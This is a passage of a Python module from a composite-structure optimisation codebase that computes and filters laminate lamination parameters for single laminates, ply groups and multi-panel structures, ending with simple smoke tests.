    - lampam: array storing the filtered lamination parameters
    INPUTS
    - lampam: lamination parameters of one laminate (1D) or several (2D)
    - constraints: design and manufacturing guidelines
    """
    if lampam.ndim not in (1, 2):
        raise Exception('This should not happen.')
    # Prefix selecting all rows when the input is a 2D batch.
    rows = (slice(None),) if lampam.ndim == 2 else ()
    if constraints.sym:
        lampam[rows + (slice(4, 8),)] = 0
    # (balance filtering deliberately disabled, as in the original)
    # if constraints.bal:
    #     lampam[rows + (slice(2, 4),)] = 0
    if constraints.n_set_of_angles:
        conventional = {0, 45, -45, 90, -90, 135, -135}
        if all(angle in conventional for angle in constraints.set_of_angles):
            for col in (3, 7, 11):
                lampam[rows + (col,)] = 0
    return lampam
def calc_lampam_from_delta_lp_matrix(stack, constraints, delta_lampams):
    """Sum ply partial lamination parameters along a stacking sequence.

    INPUTS
    - stack: laminate stacking sequence (one fibre angle per ply)
    - constraints: design and manufacturing guidelines (supplies the
      angle-to-column mapping ``ind_angles_dict``)
    - delta_lampams: ply partial lamination parameters, indexed by
      (ply position, angle index)
    """
    total = np.zeros((12,), float)
    for ply in range(delta_lampams.shape[0]):
        angle_col = constraints.ind_angles_dict[stack[ply]]
        total += delta_lampams[ply, angle_col]
    return total
def calc_lampam_2(ss):
    """Compute the 12 lamination parameters of one or more laminates.

    OUTPUTS
    - lampam: laminate lamination parameters
    INPUTS
    - ss: laminate stacking sequence(s); a list, or a 2D array with more
      than one row, is processed row by row
    """
    if isinstance(ss, list):
        out = np.zeros((len(ss), 12), float)
        for row, seq in enumerate(ss):
            out[row] = calc_lampam_2(seq)
        return out
    if ss.ndim == 2 and ss.shape[0] > 1:
        out = np.zeros((ss.shape[0], 12), float)
        for row in range(ss.shape[0]):
            out[row] = calc_lampam_2(ss[row])
        return out
    n_plies = np.size(ss)  # laminate ply count
    two_theta = np.deg2rad(2 * ss.astype(float))
    # Rows: cos 2t, cos 4t, sin 2t, sin 4t; one column per ply.
    trig = np.concatenate((
        np.cos(two_theta),
        np.cos(2 * two_theta),
        np.sin(two_theta),
        np.sin(2 * two_theta))).reshape((4, n_plies))
    ply_idx = np.arange(n_plies)
    z_0 = np.ones(n_plies)
    # Normalised through-thickness coordinate of each ply's upper boundary.
    top = (1 - n_plies / 2) * z_0 + ply_idx
    z_1 = top ** 2 - (top - 1) ** 2
    z_2 = top ** 3 - (top - 1) ** 3
    return np.array([
        (1 / n_plies) * np.matmul(trig, z_0),
        (2 / n_plies ** 2) * np.matmul(trig, z_1),
        (4 / n_plies ** 3) * np.matmul(trig, z_2)]).reshape(12)
def calc_lampam(ss, constraints=None):
    """Compute the lamination parameters of one or more laminates.

    OUTPUTS
    - lampam: laminate lamination parameters
    INPUTS
    - ss: laminate stacking sequence(s)
    - constraints: design and manufacturing guidelines; when None, the
      generic (constraint-free) routine is used
    """
    if constraints is None:
        return calc_lampam_2(ss)
    if isinstance(ss, list):
        out = np.zeros((len(ss), 12), float)
        for row in range(len(ss)):
            out[row] = calc_lampam(ss[row], constraints)
        return out
    if ss.ndim == 2 and ss.shape[0] > 1:
        out = np.zeros((ss.shape[0], 12), float)
        for row in range(ss.shape[0]):
            out[row] = calc_lampam(ss[row], constraints)
        return out
    n_plies = np.size(ss)  # laminate ply count
    if not constraints.sym:
        # Unsymmetric laminate: every ply contributes individually.
        trig = np.empty((4, n_plies), float)
        for ply in range(n_plies):
            trig[:, ply] = np.copy(constraints.cos_sin[
                constraints.ind_angles_dict[ss[ply]]].reshape((4,)))
        z_0 = np.ones(n_plies)
        top = (1 - n_plies / 2) * z_0 + np.arange(n_plies)
        z_2 = top ** 3 - (top - 1) ** 3
        z_1 = top ** 2 - (top - 1) ** 2
        return np.array([
            (1 / n_plies) * np.matmul(trig, z_0),
            (2 / n_plies ** 2) * np.matmul(trig, z_1),
            (4 / n_plies ** 3) * np.matmul(trig, z_2)]).reshape(12)
    # Symmetric laminate: only half the stacking sequence is scanned and
    # its contribution is doubled; the coupling block stays zero.
    half = np.size(ss) // 2
    trig = np.empty((4, half), float)
    for ply in range(half):
        trig[:, ply] = constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]].reshape((4,))
    z_0 = np.ones(half)
    top = (1 - n_plies / 2) * z_0 + np.arange(half)
    z_2 = top ** 3 - (top - 1) ** 3
    lampam = np.array([
        (2 / n_plies) * np.matmul(trig, z_0),
        np.array([0, 0, 0, 0]),
        (8 / n_plies ** 3) * np.matmul(trig, z_2)]).reshape(12)
    if np.size(ss) % 2:
        # Odd ply count: the middle ply straddles the mid-plane and
        # contributes once.
        mid_trig = constraints.cos_sin[
            constraints.ind_angles_dict[ss[n_plies // 2]]]
        lampam += np.array([
            (1 / n_plies) * mid_trig,
            np.zeros((4,), dtype=float),
            (1 / n_plies ** 3) * mid_trig]).reshape(12)
    return lampam
def calc_lampam_sym(ss, constraints):
    """Lamination parameters of symmetric laminates with even ply counts.

    OUTPUTS
    - lampam: laminate lamination parameters
    INPUTS
    - ss: half laminate stacking sequence(s); the full laminate has twice
      as many plies
    - constraints: design and manufacturing guidelines
    """
    if isinstance(ss, list):
        out = np.zeros((len(ss), 12), float)
        for row in range(len(ss)):
            out[row] = calc_lampam_sym(ss[row], constraints)
        return out
    if ss.ndim == 2 and ss.shape[0] > 1:
        out = np.zeros((ss.shape[0], 12), float)
        for row in range(ss.shape[0]):
            out[row] = calc_lampam_sym(ss[row], constraints)
        return out
    n_plies = 2 * np.size(ss)  # laminate ply count
    half = n_plies // 2
    trig = np.empty((4, half), float)
    for ply in range(half):
        trig[:, ply] = constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]].reshape((4,))
    z_0 = np.ones(half)
    top = (1 - n_plies / 2) * z_0 + np.arange(half)
    z_2 = top ** 3 - (top - 1) ** 3
    # Coupling terms (indices 4:8) vanish for a symmetric laminate.
    return np.array([
        (2 / n_plies) * np.matmul(trig, z_0),
        np.array([0, 0, 0, 0]),
        (8 / n_plies ** 3) * np.matmul(trig, z_2)]).reshape(12)
def calc_lampam_10_sym(ss, constraints):
    """10th lamination parameter of a symmetric, even-ply-count laminate.

    INPUTS
    - ss: half laminate stacking sequence
    - constraints: design and manufacturing guidelines
    """
    n_plies = 2 * np.size(ss)  # laminate ply count
    half = n_plies // 2
    # Component [1] of each ply's trigonometric vector (by the convention
    # of calc_lampam_2 this is cos 4*theta — confirm for constraints.cos_sin).
    trig = np.empty((half), float)
    for ply in range(half):
        trig[ply] = constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]][1]
    z_0 = np.ones(half)
    top = (1 - n_plies / 2) * z_0 + np.arange(half)
    z_2 = top ** 3 - (top - 1) ** 3
    return (8 / n_plies ** 3) * np.matmul(trig, z_2)
def calc_lampam_11_sym(ss, constraints):
    """11th lamination parameter of a symmetric, even-ply-count laminate.

    INPUTS
    - ss: half laminate stacking sequence
    - constraints: design and manufacturing guidelines
    """
    n_plies = 2 * np.size(ss)  # laminate ply count
    half = n_plies // 2
    # Component [2] of each ply's trigonometric vector (by the convention
    # of calc_lampam_2 this is sin 2*theta — confirm for constraints.cos_sin).
    trig = np.empty((half), float)
    for ply in range(half):
        trig[ply] = constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]][2]
    z_0 = np.ones(half)
    top = (1 - n_plies / 2) * z_0 + np.arange(half)
    z_2 = top ** 3 - (top - 1) ** 3
    return (8 / n_plies ** 3) * np.matmul(trig, z_2)
def calc_lampam_mp(sslist, constraints):
    """Lamination parameters of every panel of a multipanel structure.

    OUTPUTS
    - lampam: array with one row of 12 lamination parameters per panel
    INPUTS
    - sslist: list of stacking sequences, one per panel
    - constraints: design and manufacturing guidelines
    """
    lampam = np.zeros((len(sslist), 12), dtype=float)
    for panel, stacking in enumerate(sslist):
        lampam[panel] = calc_lampam(stacking, constraints)
    return lampam
def test_lampam(ss_top, n_plies_per_panel, constraints=None):
    """
    Return the lamination parameters of a symmetric multi-panel structure
    whose outer plies are known (ss_top), the remaining plies being
    assumed quasi-isotropic (zero lamination-parameter contribution).

    OUTPUTS
    - lampam: (n_panels x 12) array of the panel lamination parameters
    INPUTS
    - ss_top: list of the panel partial half stacking sequences
    - n_plies_per_panel: list of the number of plies per panel
    - constraints: design and manufacturing guidelines; when None, falls
      back on the module-level `constraints` (the original implementation
      read that global implicitly)

    RAISES
    - Exception when ss_top and n_plies_per_panel differ in length
    """
    if constraints is None:
        # Backward compatibility: keep the historical reliance on the
        # module-level `constraints` when no explicit object is given.
        constraints = globals()['constraints']
    n_panels = len(ss_top)
    if n_panels != len(n_plies_per_panel):
        raise Exception('This should not happen!')
    lampam = np.zeros((n_panels, 12), dtype=float)
    for ind_panel in range(n_panels):
        # A group spanning half the laminate plus one ply contains the
        # middle ply; pass its index on so calc_delta_lampam counts it
        # once instead of mirroring it.
        if n_plies_per_panel[ind_panel] // 2 + 1 == len(ss_top[ind_panel]):
            middle_ply = len(ss_top[ind_panel])
            n_plies_group = len(ss_top[ind_panel]) - 1
        else:
            middle_ply = 0
            n_plies_group = len(ss_top[ind_panel])
        lampam[ind_panel] = calc_delta_lampam(
            ss_top[ind_panel],
            n_first_ply=1,
            n_plies_group=n_plies_group,
            n_plies_in_panels=n_plies_per_panel[ind_panel],
            constraints=constraints,
            middle_ply=middle_ply)
    return lampam
def calc_delta_lampam(ss, n_first_ply, n_plies_group, n_plies_in_panels,
                      constraints, middle_ply=0):
    """
    Return the lamination parameters of a group of plies, accounting for
    both mirrored halves when the laminate is symmetric.

    Attention: when a middle ply plus X other plies are considered, pass X
    as the number of plies, not X + 1/2.

    OUTPUTS
    - delta_lampam: (12,) array of the partial lamination parameters
    INPUTS
    - ss: array of the sublaminate stacking sequence
    - n_first_ply: position of the sublaminate top ply, counted from the
      bottom to the top of the laminate (int)
    - n_plies_group: ply count of the sublaminate (int);
      BEWARE: n_plies_group does not account for any middle ply!
    - n_plies_in_panels: ply count of the laminate (int)
    - constraints: design and manufacturing guidelines
    - middle_ply: 0 when no ply overlaps the mid-surface, otherwise the
      position number of that ply
    """
    if n_plies_group > ss.size:
        raise Exception("""
The stacking sequence of the sublaminate does not have enough plies.""")
    if n_plies_group + n_first_ply - 1 > n_plies_in_panels:
        raise Exception("""
The sublaminate is not defined as to be within the laminate.""")
    # (4 x n_plies_group) matrix of the trigonometric terms of each ply
    cos_sin = np.empty((4, n_plies_group), float)
    for ply in range(n_plies_group):
        cos_sin[:, ply] = constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]].reshape((4,))
    # normalized ply-boundary moments (offset measured from mid-plane)
    offset = (n_first_ply - n_plies_in_panels / 2) + np.arange(n_plies_group)
    z_0 = np.ones(n_plies_group)
    z_2 = offset ** 3 - (offset - 1) ** 3
    if constraints.sym:
        # mirrored half counted via the doubled A/D factors; B terms vanish
        delta_lampam = np.array([
            (2 / n_plies_in_panels) * np.matmul(cos_sin, z_0),
            np.zeros((4,), dtype=float),
            (8 / n_plies_in_panels ** 3) * np.matmul(cos_sin, z_2)
            ]).reshape(12)
    else:
        z_1 = offset ** 2 - (offset - 1) ** 2
        delta_lampam = np.array([
            (1 / n_plies_in_panels) * np.matmul(cos_sin, z_0),
            (2 / n_plies_in_panels ** 2) * np.matmul(cos_sin, z_1),
            (4 / n_plies_in_panels ** 3) * np.matmul(cos_sin, z_2)
            ]).reshape(12)
    # contribution of a ply overlapping the middle surface (counted once)
    if n_first_ply + n_plies_group == middle_ply:
        cos_sin_mid = constraints.cos_sin[
            constraints.ind_angles_dict[ss[n_plies_group]]].reshape(4)
        delta_lampam += np.array([
            (1 / n_plies_in_panels) * cos_sin_mid,
            np.zeros((4,), dtype=float),
            (1 / n_plies_in_panels ** 3) * cos_sin_mid]).reshape(12)
    return delta_lampam
def calc_delta_lampamA(ss, n_first_ply, n_plies_group, n_plies_in_panels,
                       constraints, middle_ply=0):
    """
    Return the in-plane lamination parameters of a group of plies,
    accounting for both mirrored halves when the laminate is symmetric.

    Attention: when a middle ply plus X other plies are considered, pass X
    as the number of plies, not X + 1/2.

    OUTPUTS
    - delta_lampam: (4,) array of the partial in-plane parameters
    INPUTS
    - ss: array of the sublaminate stacking sequence
    - n_first_ply: position of the sublaminate top ply, counted from the
      bottom to the top of the laminate (int)
    - n_plies_group: ply count of the sublaminate (int);
      BEWARE: n_plies_group does not account for any middle ply!
    - n_plies_in_panels: ply count of the laminate (int)
    - constraints: design and manufacturing guidelines
    - middle_ply: 0 when no ply overlaps the mid-surface, otherwise the
      position number of that ply
    """
    if n_plies_group > ss.size:
        raise Exception("""
The stacking sequence of the sublaminate does not have enough plies.""")
    if n_plies_group + n_first_ply - 1 > n_plies_in_panels:
        raise Exception("""
The sublaminate is not defined as to be within the laminate.""")
    # accumulate the trigonometric terms of every ply of the group
    cos_sin = np.zeros((4,), float)
    for ply in range(n_plies_group):
        cos_sin = cos_sin + constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]].reshape(4)
    if not constraints.sym:
        return (1 / n_plies_in_panels) * cos_sin
    # a ply overlapping the mid-surface contributes half a mirrored ply
    if n_first_ply + n_plies_group == middle_ply:
        cos_sin = cos_sin + 0.5 * constraints.cos_sin[
            constraints.ind_angles_dict[ss[n_plies_group]]].reshape(4)
    return (2 / n_plies_in_panels) * cos_sin
def calc_delta_lampamD(ss, n_first_ply, n_plies_group, n_plies_in_panels,
                       constraints, middle_ply=0):
    """
    Return the out-of-plane lamination parameters of a group of plies,
    accounting for both mirrored halves when the laminate is symmetric.

    Attention: when a middle ply plus X other plies are considered, pass X
    as the number of plies, not X + 1/2.

    OUTPUTS
    - delta_lampam: (4,) array of the partial out-of-plane parameters
    INPUTS
    - ss: array of the sublaminate stacking sequence
    - n_first_ply: position of the sublaminate top ply, counted from the
      bottom to the top of the laminate (int)
    - n_plies_group: ply count of the sublaminate (int);
      BEWARE: n_plies_group does not account for any middle ply!
    - n_plies_in_panels: ply count of the laminate (int)
    - constraints: design and manufacturing guidelines
    - middle_ply: 0 when no ply overlaps the mid-surface, otherwise the
      position number of that ply
    """
    if n_plies_group > ss.size:
        raise Exception("""
The stacking sequence of the sublaminate does not have enough plies.""")
    if n_plies_group + n_first_ply - 1 > n_plies_in_panels:
        raise Exception("""
The sublaminate is not defined as to be within the laminate.""")
    # (4 x n_plies_group) matrix of the trigonometric terms of each ply
    cos_sin = np.empty((4, n_plies_group), float)
    for ply in range(n_plies_group):
        cos_sin[:, ply] = constraints.cos_sin[
            constraints.ind_angles_dict[ss[ply]]].reshape((4,))
    # cubic ply-boundary moments (offset measured from mid-plane)
    offset = (n_first_ply - n_plies_in_panels / 2) + np.arange(n_plies_group)
    z_2 = offset ** 3 - (offset - 1) ** 3
    # the mirrored half doubles the factor for symmetric laminates
    factor = 8 if constraints.sym else 4
    delta_lampam = (factor / n_plies_in_panels ** 3) * np.matmul(cos_sin, z_2)
    # contribution of a ply overlapping the middle surface
    if n_first_ply + n_plies_group == middle_ply:
        cos_sin_mid = constraints.cos_sin[
            constraints.ind_angles_dict[ss[n_plies_group]]]
        delta_lampam += (1 / n_plies_in_panels ** 3) * cos_sin_mid.reshape((4))
    return delta_lampam
def calc_delta_lampam_mp(ss, multipanel, constraints, inner_step=-1):
    """
    Return the lamination parameters associated with a group of plies of a
    multi-panel structure.

    OUTPUTS
    - delta_lampam: (n_panels x 12) array of partial lamination parameters
    INPUTS
    - ss: list of the group stacking sequences, one per panel
    - multipanel: multi-panel structure
    - constraints: design and manufacturing guidelines
    - inner_step: index of the step for the inner loop
    """
    if len(ss) != multipanel.n_panels:
        raise Exception("""
Incorrect number of input stacking sequences for the multipanel structure.""")
    last_step = inner_step == multipanel.reduced.n_groups - 1
    # validate the ply counts of the partial stacking sequences
    # (only symmetric laminates are checked, as in the original design)
    if constraints.sym:
        for ind_panel, panel in enumerate(multipanel.panels):
            size = ss[ind_panel].size
            n_group = panel.n_plies_per_group[inner_step]
            valid = (
                # plain group with no middle ply involved at this step
                (size == n_group
                 and (panel.middle_ply == 0 or not last_step))
                # last group carrying the extra middle ply
                or (size == n_group + 1
                    and panel.middle_ply != 0 and last_step)
                # last group given as the complete panel stacking sequence
                or (size == panel.n_plies and last_step))
            if not valid:
                raise Exception("""
The input stacking sequences do not have the correct number of plies.""")
    delta_lampam = np.zeros((multipanel.n_panels, 12), dtype=float)
    for ind_panel, panel in enumerate(multipanel.panels):
        if panel.middle_ply != 0 and last_step:
            delta_lampam[ind_panel] = calc_delta_lampam(
                ss=ss[ind_panel],
                n_first_ply=panel.n_first_plies[inner_step],
                n_plies_group=panel.n_plies_per_group[inner_step],
                n_plies_in_panels=panel.n_plies, constraints=constraints,
                middle_ply=panel.middle_ply)
        else:
            delta_lampam[ind_panel] = calc_delta_lampam(
                ss=np.array(ss[ind_panel], int),
                n_first_ply=panel.n_first_plies[inner_step],
                n_plies_group=panel.n_plies_per_group[inner_step],
                n_plies_in_panels=panel.n_plies, constraints=constraints,
                middle_ply=0)
    return delta_lampam
def calc_delta_lampam_mp_2(ss, multipanel, constraints, ss2=None):
    """
    Return the lamination parameters of the outer plies used for damage
    tolerance for each panel of a multi-panel structure.

    NOTE(review): only ss[0] (and ss2[0] for unsymmetric laminates) is
    used — every panel appears to share the same outer plies; confirm
    against callers.

    OUTPUTS
    - delta_lampam: (n_panels x 12) array of partial lamination parameters
    INPUTS
    - ss: list of arrays storing the fibre orientations of the two outer
      plies of each panel
    - multipanel: multi-panel structure
    - constraints: design and manufacturing guidelines
    - ss2: bottom outer plies, required when the laminate is unsymmetric
    """
    if len(ss) != multipanel.n_panels:
        raise Exception("""
Incorrect number of input stacking sequences for the multipanel structure.""")
    for ss_panel in ss:
        if ss_panel.size != 2:
            raise Exception("""
The input stacking sequences do not have a correct number of plies.""")
    delta_lampam = np.zeros((multipanel.n_panels, 12), dtype=float)
    ss_outer = ss[0]
    # top outer plies contribute to every panel
    for ind_panel, panel in enumerate(multipanel.panels):
        delta_lampam[ind_panel] = calc_delta_lampam(
            ss=ss_outer,
            n_first_ply=1,
            n_plies_group=2,
            n_plies_in_panels=panel.n_plies,
            constraints=constraints,
            middle_ply=0)
    if not constraints.sym:
        # unsymmetric laminates: add the bottom outer plies as well
        ss2_outer = ss2[0]
        for ind_panel, panel in enumerate(multipanel.panels):
            delta_lampam[ind_panel] += calc_delta_lampam(
                ss=ss2_outer,
                n_first_ply=panel.n_plies - 1,
                n_plies_group=2,
                n_plies_in_panels=panel.n_plies,
                constraints=constraints,
                middle_ply=0)
    return delta_lampam
def calc_delta_lampam_mp_3(
        ss, n_first_ply, n_plies, constraints, middle_ply=0):
    """
    Return the lamination parameters contributed by a single ply in each
    panel of a multi-panel structure.  Panels the ply does not cover
    (n_first_ply[ind_panel] <= 0) receive zero contributions.

    OUTPUTS
    - delta_lampam: (n_panels x 12) array of partial lamination parameters
    INPUTS
    - ss: fibre orientation of the ply added to the multi-panel structure
    - n_first_ply[ind_panel]: number of the ply in each panel, or 0 when
      the patch does not cover that panel
    - n_plies: number of plies of the laminate of each panel
    - constraints: design and manufacturing guidelines
    - middle_ply[ind_panel]: 0 when no ply overlaps the mid-surface,
      otherwise the position number of that ply
    """
    n_panels = n_first_ply.size
    ply_angle = np.array([ss])
    delta_lampam = np.zeros((n_panels, 12), dtype=float)
    if middle_ply == 0:
        # scalar default: no panel has a middle ply
        middle_ply = np.zeros((n_panels,))
    for ind_panel in range(n_panels):
        if n_first_ply[ind_panel] <= 0:
            continue  # the ply does not cover this panel
        is_middle = middle_ply[ind_panel] == n_first_ply[ind_panel]
        delta_lampam[ind_panel] = calc_delta_lampam(
            ply_angle,
            n_first_ply=n_first_ply[ind_panel],
            n_plies_group=0 if is_middle else 1,
            n_plies_in_panels=n_plies[ind_panel],
            constraints=constraints,
            middle_ply=middle_ply[ind_panel] if is_middle else 0)
    return delta_lampam
def calc_delta_lampam_mp_3A(
        ss, n_first_ply, n_plies, constraints, middle_ply=0):
    """
    Return the in-plane lamination parameters contributed by a single ply
    in each panel of a multi-panel structure.  Panels the ply does not
    cover (n_first_ply[ind_panel] <= 0) receive zero contributions.

    OUTPUTS
    - delta_lampam: (n_panels x 4) array of partial in-plane parameters
    INPUTS
    - ss: fibre orientation of the ply added to the multi-panel structure
    - n_first_ply[ind_panel]: number of the ply in each panel, or 0 when
      the patch does not cover that panel
    - n_plies: number of plies of the laminate of each panel
    - constraints: design and manufacturing guidelines
    - middle_ply[ind_panel]: 0 when no ply overlaps the mid-surface,
      otherwise the position number of that ply
    """
    n_panels = n_first_ply.size
    ply_angle = np.array([ss])
    delta_lampam = np.zeros((n_panels, 4), dtype=float)
    if middle_ply == 0:
        # scalar default: no panel has a middle ply
        middle_ply = np.zeros((n_panels,))
    for ind_panel in range(n_panels):
        if n_first_ply[ind_panel] <= 0:
            continue  # the ply does not cover this panel
        is_middle = middle_ply[ind_panel] == n_first_ply[ind_panel]
        delta_lampam[ind_panel] = calc_delta_lampamA(
            ply_angle,
            n_first_ply=n_first_ply[ind_panel],
            n_plies_group=0 if is_middle else 1,
            n_plies_in_panels=n_plies[ind_panel],
            constraints=constraints,
            middle_ply=middle_ply[ind_panel] if is_middle else 0)
    return delta_lampam
def calc_delta_lampam_mp_3D(
        ss, n_first_ply, n_plies, constraints, middle_ply=0):
    """
    Return the out-of-plane lamination parameters contributed by a single
    ply in each panel of a multi-panel structure.  Panels the ply does not
    cover (n_first_ply[ind_panel] <= 0) receive zero contributions.

    OUTPUTS
    - delta_lampam: (n_panels x 4) array of partial out-of-plane parameters
    INPUTS
    - ss: fibre orientation of the ply added to the multi-panel structure
    - n_first_ply[ind_panel]: number of the ply in each panel, or 0 when
      the patch does not cover that panel
    - n_plies: number of plies of the laminate of each panel
    - constraints: design and manufacturing guidelines
    - middle_ply[ind_panel]: 0 when no ply overlaps the mid-surface,
      otherwise the position number of that ply
    """
    n_panels = n_first_ply.size
    ply_angle = np.array([ss])
    delta_lampam = np.zeros((n_panels, 4), dtype=float)
    if middle_ply == 0:
        # scalar default: no panel has a middle ply
        middle_ply = np.zeros((n_panels,))
    for ind_panel in range(n_panels):
        if n_first_ply[ind_panel] <= 0:
            continue  # the ply does not cover this panel
        is_middle = middle_ply[ind_panel] == n_first_ply[ind_panel]
        delta_lampam[ind_panel] = calc_delta_lampamD(
            ply_angle,
            n_first_ply=n_first_ply[ind_panel],
            n_plies_group=0 if is_middle else 1,
            n_plies_in_panels=n_plies[ind_panel],
            constraints=constraints,
            middle_ply=middle_ply[ind_panel] if is_middle else 0)
    return delta_lampam
def calc_delta_lampam_tab(
        angle, n_first_ply, n_plies_group, N, constraints, middle_ply=0):
    '''
    Return the partial lamination parameters of several candidate ply
    groups of uniform ply thickness, accounting for the two mirrored
    halves of symmetric laminates.

    OUTPUTS
    - delta_lampam_tab: partial lamination parameters, one row per
      candidate stacking sequence
    INPUTS
    - angle: candidate sublaminate stacking sequences, one per row
    - n_first_ply: position of the first ply of the sublaminate, counted
      from the bottom to the top of the laminate (scalar)
    - n_plies_group: number of plies constituting the sublaminate (scalar)
    - N: total number of plies of the laminate (scalar)
    - constraints: design and manufacturing guidelines
    - middle_ply: 0 when no ply overlaps the mid-surface, otherwise the
      position number of that ply
    '''
    if n_plies_group > angle.size:
        raise Exception("""
The input set of angles have fewer elements that what is asked to be checked
""")
    if n_plies_group + n_first_ply - 1 > N:
        raise Exception("""
The sublaminate is not properly defined as to be contained within the laminate
""")
    n_candidates = angle.shape[0]
    delta_lampam_tab = np.empty((n_candidates, 12), dtype=float)
    for row in range(n_candidates):
        delta_lampam_tab[row] = calc_delta_lampam(
            angle[row],
            n_first_ply,
            n_plies_group,
            N,
            constraints,
            middle_ply)
    return delta_lampam_tab
def calc_delta_lampam_tab_t(angle, position_top, thickness, n_plies_group,
                            constraints, middle_ply=0):
    '''
    Return the partial lamination parameters of several candidate ply
    groups of varying ply thickness, accounting for the two mirrored
    halves of symmetric laminates.

    OUTPUTS
    - delta_lampam_tab: sublaminate lamination parameters, one row per
      candidate stacking sequence
    INPUTS
    - angle: candidate sublaminate stacking sequences, one per row
    - position_top: normalized position of the top of the sublaminate
    - thickness: thicknesses of the plies
    - n_plies_group: ply count of the sublaminate (scalar); does not
      account for middle_ply!
    - constraints: set of constraints
    - middle_ply: 0 when no ply overlaps the mid-surface, otherwise the
      position number of that ply
    '''
    if n_plies_group > angle.size:
        raise Exception("""
The input set of angles have fewer elements that what is asked to be checked
""")
    n_candidates = angle.shape[0]
    delta_lampam_tab = np.empty((n_candidates, 12), float)
    for row in range(n_candidates):
        delta_lampam_tab[row] = calc_delta_lampam_tab_t_1(
            np.array(angle[row]),
            position_top,
            thickness,
            n_plies_group,
            constraints,
            middle_ply)
    return delta_lampam_tab
def calc_delta_lampam_tab_t_1(angle, position_top, thickness, n_plies_group,
                              constraints, middle_ply=0):
    '''
    Return the partial lamination parameters of a group of plies of
    varying thickness, accounting for the two mirrored halves of
    symmetric laminates.

    OUTPUTS
    - delta_lampam: sublaminate partial lamination parameters, (12,) array
    INPUTS
    - angle: sublaminate stacking sequence
    - position_top: normalized position of the top of the sublaminate
    - thickness: thicknesses of the plies
    - n_plies_group: ply count of the sublaminate (scalar); does not
      account for middle_ply!
    - constraints: set of constraints
    - middle_ply: 0 when no ply overlaps the mid-surface, otherwise the
      position number of that ply
    '''
    if angle.size == 0:
        return np.zeros((12,), float)
    # the group must fit within the (normalized) laminate thickness:
    # positions run down to 0 for symmetric laminates, to -1 otherwise
    lower_bound = 0 if constraints.sym else -1
    if position_top - sum(thickness) < lower_bound - 1e-14:
        raise Exception("""
The sublaminate is not properly defined as to be contained within the laminate
""")
    # normalized positions of the boundaries of the plies of the group
    boundaries = np.empty(n_plies_group + 1, float)
    boundaries[0] = position_top
    for ply in range(n_plies_group):
        boundaries[ply + 1] = boundaries[ply] - thickness[ply]
    tops = boundaries[:-1]
    bots = boundaries[1:]
    # (4 x n_plies_group) matrix of the trigonometric terms of each ply
    cos_sin = np.empty((4, n_plies_group), float)
    for ply in range(n_plies_group):
        cos_sin[:, ply] = constraints.cos_sin[
            constraints.ind_angles_dict[angle[ply]]].reshape((4,))
    z_0 = tops - bots
    z_2 = tops ** 3 - bots ** 3
    if constraints.sym:
        delta_lampam = np.array([
            np.matmul(cos_sin, z_0),
            np.zeros((4,), dtype=float),
            np.matmul(cos_sin, z_2)]).reshape(12)
        # contribution of a ply overlapping the middle surface
        if middle_ply != 0:
            if angle.size != n_plies_group + 1:
                raise Exception("""
The ply orientation of the middle-ply is not given as input""")
            cos_sin_mid = constraints.cos_sin[
                constraints.ind_angles_dict[angle[-1]]]
            delta_lampam += np.array([
                bots[-1] * cos_sin_mid,
                np.zeros((4,), dtype=float),
                (bots[-1] ** 3) * cos_sin_mid]).reshape(12)
        return delta_lampam
    # minus sign: the gradual approach uses a top-to-bottom convention
    z_1 = -(tops ** 2 - bots ** 2)
    return 0.5 * np.array([
        np.matmul(cos_sin, z_0),
        np.matmul(cos_sin, z_1),
        np.matmul(cos_sin, z_2)]).reshape(12)
if __name__ == "__main__":
    # Manual smoke tests for the lamination-parameter routines above.
    constraints = Constraints(
        sym=False,
        set_of_angles=np.array([0, 45, 90, -45]))
    parameters = Parameters(constraints=constraints,
                            group_size_min=10, group_size_max=20)
    print('\n*** Test for the function filter_lampam ***\n')
    # lampam = np.arange(1, 13)
    # lampam = np.arange(1, 25).reshape((2, 12))
    # print('Lamination parameters:\n')
    # lampam = filter_lampam(lampam, constraints)
    # print_lampam(lampam[1])
    print('\n*** Test for the function calc_lampam ***\n')
    print('Input stacking sequence:\n')
    ss = np.array([45, 90, 45, 45, 0, -45, -45, 0, 90, -45])
    print(f'{ss}\n')
    print('Lamination parameters:\n')
    # pass `constraints` explicitly: calc_lampam is called with it
    # everywhere else in this module (see calc_lampam_mp)
    lampam = calc_lampam(ss, constraints)
    print_lampam(lampam)
    print('\n*** Test for the function calc_lampam_mp ***\n')
    # ss_target1 = np.array([0, 0, 0, 0])
    # ss_target2 = np.array([0, 0, 90, 0, 0])
    # sslist = [ss_target1, ss_target2]
    # print(f'sslist: {sslist}')
    # print('Lamination parameter outputs:\n')
    # lampam = calc_lampam_mp(sslist, constraints)
    # print_lampam(lampam[0])
    # print_lampam(lampam[1])
    print('\n*** Test for the function test_lampam ***\n')
    # print('Input stacking sequence:\n')
    # ss = np.array([0, 0, 90, 0, 0])
    # ss_top = [ss, ss]
    # n_plies_per_panel = [20, 10]
    # print(f'{ss}\n')
    # print('Lamination parameters:\n')
    # lampam = test_lampam(ss_top, n_plies_per_panel)
    # print_lampam(lampam[0], lampam[1])
    print("""\n*** Test for the functions:
    calc_delta_lampam
    calc_delta_lampamA
    calc_delta_lampamD ***\n""")
    # print('Input stacking sequence:\n')
    # ss = np.array([0, 0, 0, 0, 90, 90, 90, 0, 0, 0, 0])
    # n_first_ply = 1
    # n_plies_group = 5
    # n_plies_in_panels = 10
    # print(f'{ss}\n')
    # print('Lamination parameters:\n')
    # lampam = calc_delta_lampam(
    #     ss, n_first_ply, n_plies_group, n_plies_in_panels, constraints,
    #     middle_ply=0)
    # print_lampam(lampam)
    # lampamA = calc_delta_lampamA(
    #     ss, n_first_ply, n_plies_group, n_plies_in_panels, constraints,
    #     middle_ply=0)
    # print(lampamA)
    # lampamD = calc_delta_lampamD(
    #     ss, n_first_ply, n_plies_group, n_plies_in_panels, constraints,
    #     middle_ply=0)
    # print(lampamD)
    print('\n*** Test for the function calc_delta_lampam_mp ***\n')
    # print('Inputs:\n')
    # group_size_min = 4
    # # Desired number of plies for the groups at each outer loop
    # group_size_max = 10
    # # Maximum number of ply drop layouts to test for each group search
    # n_pdl_max = 5
    # # Relative importance of the lamination parameters from the global level
